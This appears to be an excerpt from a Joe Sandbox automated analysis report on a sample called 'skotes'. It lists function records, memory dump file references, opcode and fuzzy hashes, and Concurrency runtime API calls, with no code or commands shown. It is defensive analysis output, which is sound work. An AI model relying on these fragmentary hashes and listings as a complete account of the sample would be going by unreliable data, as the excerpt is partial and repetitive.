Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 094e8a0f3bce6c07c61031f93608600f6c151f0e61d94669401ba84417781954
Instruction ID: d25f59c851155858dfca88a8e66668f5de182f8ed3116e5afb4592376e8681e2
Opcode Fuzzy Hash: 094e8a0f3bce6c07c61031f93608600f6c151f0e61d94669401ba84417781954
Instruction Fuzzy Hash: 00F02171E00A00ABC700BB698D06B4E7B74EB42BA4F90026EE820272D1EB781A0047DB

Function 04D60E03 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3100927467.0000000004D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4d60000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 092bacca70bf84c28f4c0de4b0792342b97ec270f4a2f5d9d6a36ddeef4f0536
Instruction ID: 13f91d30b23b384ec47eda5db6054f41215783d3794878949a2501fc8a5ec416
Opcode Fuzzy Hash: 092bacca70bf84c28f4c0de4b0792342b97ec270f4a2f5d9d6a36ddeef4f0536
Instruction Fuzzy Hash: DC0192EB31C120AF7247C5427B109B76B6DE1D6730330C42BF487C6602F295AE4A3135

Function 04D60E05 Relevance: .1, Instructions: 80COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3100927467.0000000004D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4d60000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff58a61c64a889f4069dc030f875db0498ab09efcd0d58aedb1d79fa56916873
Instruction ID: c1560d90cd1a6aa47cfe7215a4fd090e21db3b236836f5fa6bba712453e1e987
Opcode Fuzzy Hash: ff58a61c64a889f4069dc030f875db0498ab09efcd0d58aedb1d79fa56916873
Instruction Fuzzy Hash: 7F0192EB31C120AF7247C5426B109B75B6DE1D6730330C42BF487C6602F295AE4A3135

Function 04D60E66 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3100927467.0000000004D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4d60000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82e8e37eb8bf288886a6b46e436430dd3c2b8642e897e86b62f1aca00b7a5eec
Instruction ID: 70525e42dcd989203f5630181962072cfb97dcfcb6716f9aaa7064dfd264eb90
Opcode Fuzzy Hash: 82e8e37eb8bf288886a6b46e436430dd3c2b8642e897e86b62f1aca00b7a5eec
Instruction Fuzzy Hash: 54F0C2DB25D034AF7143C40226205F71F29E5E5B303308817F0C78A642F259BE893531

Function 04D60E39 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3100927467.0000000004D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4d60000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2739434d84682cba015c34d512079f6a20eecdb8685ecec9c0dc503c8c4c4a46
Instruction ID: cfd6bf1b5240807fc8377e033aec699cbf791e7bca3b0d4c8f182cd6da440829
Opcode Fuzzy Hash: 2739434d84682cba015c34d512079f6a20eecdb8685ecec9c0dc503c8c4c4a46
Instruction Fuzzy Hash: C1F0A4EB21D120AF6247C55267216B71B6DE2E5730330C427F487CA642F299AE897135

Function 04D60E78 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3100927467.0000000004D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4d60000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54eb5fee5195029b1d074b3f010ae48dc9fa2b9b822ce0b5f800b64f243b8d7b
Instruction ID: 365c78b2a68c9c1d31cafe5c004d7c34cb464d316bc0fbd7197fd92aa118b5d3
Opcode Fuzzy Hash: 54eb5fee5195029b1d074b3f010ae48dc9fa2b9b822ce0b5f800b64f243b8d7b
Instruction Fuzzy Hash: 24014EA730C1619FD347C55126551B53F74E9DB130320819BE0D3CE153E24A9D4AA235

Function 04D60E4D Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3100927467.0000000004D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4d60000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cdd7d714477a6c2f573880a5456f0a48434eb0b387cd0c3f18ec20f91edde075
Instruction ID: 280eb0323a1e06d1e72f3a593cfe80f5f8c6812d108e867ae7639111e2d57400
Opcode Fuzzy Hash: cdd7d714477a6c2f573880a5456f0a48434eb0b387cd0c3f18ec20f91edde075
Instruction Fuzzy Hash: 3AF0B4EB31C134AF7143C44277202BA1A2DE1E9630330C42BF4C7CA602F259AE8D3135

Function 04D60EB2 Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3100927467.0000000004D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4d60000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1cde5e4a9fad92e94ce51368039d3f4403f6aa5f54a6e80e5f75c7d905d457d4
Instruction ID: 3bd3102f07fb75c0d8f7474175d67d1d333408da88470106d4fcc994486c7a22
Opcode Fuzzy Hash: 1cde5e4a9fad92e94ce51368039d3f4403f6aa5f54a6e80e5f75c7d905d457d4
Instruction Fuzzy Hash: 40E0929B29C0609F1103C44262106F61A29F6D5F31371CC1BF0879A401F15AAD8A3574

Function 04D60ECF Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3100927467.0000000004D60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_4d60000_skotes.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c735b942f70a4a67f7569d55ff246f30024772ef99db2ca254b74077e0e05a1
Instruction ID: a99d42e3c5ca5c16868851622742df9f5f47ba37220af4742aa0b737beaced8c
Opcode Fuzzy Hash: 4c735b942f70a4a67f7569d55ff246f30024772ef99db2ca254b74077e0e05a1
Instruction Fuzzy Hash: 58D05EA732C061AF2107C44226109BB2A2DE4E5631331C86BF487CA141E69AED467534

Non-executed Functions

Function 00420E13 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 284COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00420F16
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00420F62

Part of subcall function 0042265D: Concurrency::details::GlobalCore::Initialize.LIBCONCRT ref: 00422750

Concurrency::details::ResourceManager::AffinityRestriction::FindGroupAffinity.LIBCONCRT ref: 00420FCE
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 00420FEA
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 0042103E
Concurrency::details::GlobalNode::Initialize.LIBCONCRT ref: 0042106B
Concurrency::details::ResourceManager::CleanupTopologyInformation.LIBCMT ref: 004210C1

Strings

(, xrefs: 00420F22

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$GlobalInitialize$Node::$AffinityManager::Resource$CleanupCore::FindGroupInformationRestriction::Topology
String ID: (
API String ID: 2943730970-3887548279
Opcode ID: 22e5feb3b8ffa52796b035933724c9fa3054786b9dc1ab1bb7cc308881cf94b6
Instruction ID: d8c2f6391a379bc46cf5e5d5dc6ad3851f43131c5326ae158e38cbfcee68216d
Opcode Fuzzy Hash: 22e5feb3b8ffa52796b035933724c9fa3054786b9dc1ab1bb7cc308881cf94b6
Instruction Fuzzy Hash: 89B18BB0A00625EFCB28CF58E980A7AB7F4FF48700F51416EE905AB751D374A981CB99

Function 00421602 Relevance: 13.7, APIs: 9, Instructions: 213memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00422CFC: Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00422D0F

Concurrency::details::ResourceManager::PreProcessDynamicAllocationData.LIBCONCRT ref: 00421614

Part of subcall function 00422E0F: Concurrency::details::ResourceManager::HandleBorrowedCores.LIBCONCRT ref: 00422E39
Part of subcall function 00422E0F: Concurrency::details::ResourceManager::HandleSharedCores.LIBCONCRT ref: 00422EA8

Concurrency::details::ResourceManager::IncreaseFullyLoadedSchedulerAllocations.LIBCMT ref: 00421746
Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 004217A6
Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 004217B2
Concurrency::details::ResourceManager::DistributeExclusiveCores.LIBCONCRT ref: 004217ED
Concurrency::details::ResourceManager::AdjustDynamicAllocation.LIBCONCRT ref: 0042180E
Concurrency::details::ResourceManager::PrepareReceiversForCoreTransfer.LIBCMT ref: 0042181A
Concurrency::details::ResourceManager::DistributeIdleCores.LIBCONCRT ref: 00421823
Concurrency::details::ResourceManager::ResetGlobalAllocationData.LIBCMT ref: 0042183B

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::Manager::Resource$AllocationCores$Dynamic$AdjustCoreDataDistributeHandlePrepareReceiversTransfer$AllocationsBorrowedBuffersExclusiveFullyGlobalIdleIncreaseInitializeLoadedProcessResetSchedulerShared
String ID:
API String ID: 2508902052-0
Opcode ID: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
Instruction ID: 90d9306956e5cc9bb6704af0189ae29657119f80b0b7e1970bf61bc55afc2ad7
Opcode Fuzzy Hash: aa9f8f36a8b7b44e1180d435f458fb72d8e9ffd861c0e8264618b64b20c70f21
Instruction Fuzzy Hash: FA818C71F00225AFCB18DFA9D580A6EB7F1FF98304B6542AED405A7711CB74AD42CB88

Function 0042EC48 Relevance: 6.1, APIs: 4, Instructions: 139COMMON

Download Yara Rule

APIs

Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 0042EC81

Part of subcall function 00428F2F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 00428F50

Concurrency::details::SchedulerBase::GetInternalContext.LIBCONCRT ref: 0042ECE7
Concurrency::details::WorkItem::ResolveToken.LIBCONCRT ref: 0042ECFF
Concurrency::details::WorkItem::BindTo.LIBCONCRT ref: 0042ED0C

Part of subcall function 0042E7AF: Concurrency::details::InternalContextBase::ReclaimVirtualProcessor.LIBCONCRT ref: 0042E7D7
Part of subcall function 0042E7AF: Concurrency::details::SchedulerBase::TriggerCommitSafePoints.LIBCMT ref: 0042E86F
Part of subcall function 0042E7AF: Concurrency::details::SchedulerBase::VirtualProcessorActive.LIBCONCRT ref: 0042E879
Part of subcall function 0042E7AF: Concurrency::location::_Assign.LIBCMT ref: 0042E8AD
Part of subcall function 0042E7AF: Concurrency::details::ScheduleGroupSegmentBase::AddRunnableContext.LIBCONCRT ref: 0042E8B5

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3006028571.0000000000475000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007186776.0000000000476000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3007552218.0000000000477000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010267158.00000000005CA000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3010737153.00000000005CD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005E0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3011935987.00000000005EE000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3012938254.00000000005F0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014211526.00000000005F5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3014634601.00000000005F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017118312.00000000005F7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3017867209.000000000061C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019295283.0000000000626000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019505154.0000000000627000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3019981308.000000000062E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020303555.0000000000645000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3020779645.0000000000647000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3021548494.0000000000648000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3023953666.000000000064D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3026685506.0000000000653000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3027014546.0000000000654000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3032162138.000000000065C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3033898781.000000000065D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3034808996.0000000000667000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035097879.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035280475.000000000066C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3035886817.0000000000671000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3040982587.0000000000679000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3043825599.000000000067A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046060014.000000000067B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046278093.0000000000683000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3046665739.0000000000695000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3047793638.0000000000696000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3048177118.00000000006A0000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006A1000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3049934428.00000000006BF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054221750.00000000006D6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054533711.00000000006D8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054729198.00000000006F0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3054835331.00000000006F1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056026049.00000000006F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056453714.00000000006F8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056635253.0000000000705000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3056769597.0000000000706000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::$Base::Context$Scheduler$EventInternalItem::ProcessorVirtualWork$ActiveAssignBindCommitConcurrency::location::_GroupPointsReclaimResolveRunnableSafeScheduleSegmentThrowTokenTraceTrigger
String ID:
API String ID: 2363638799-0
Opcode ID: 61a48eb18c36016cf9376c863cf090d5461b458c764e45c256d8a2d92b022f72
Instruction ID: 5e7ff754d2b343dc4c16742e0cc3e1cb9d27b644ec3e5e3051372794b2f11420
Opcode Fuzzy Hash: 61a48eb18c36016cf9376c863cf090d5461b458c764e45c256d8a2d92b022f72
Instruction Fuzzy Hash: 8051E335B10225EBCF14DF52D885BAEB771AF44314F5540AAE9027B392CB78AE02CB95

Function 0041CB97 Relevance: 1.5, APIs: 1, Instructions: 9nativeCOMMON

Download Yara Rule

APIs

NtFlushProcessWriteBuffers.NTDLL ref: 0041CBAA

Memory Dump Source

Source File: 00000006.00000002.2997911476.0000000000401000.00000040.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.2997531301.0000000000400000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2997911476.0000000000462000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005531706.0000000000469000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.3005777584.000000000046B000.00000040.00000001.01000000.00000007.sdmpDownload File
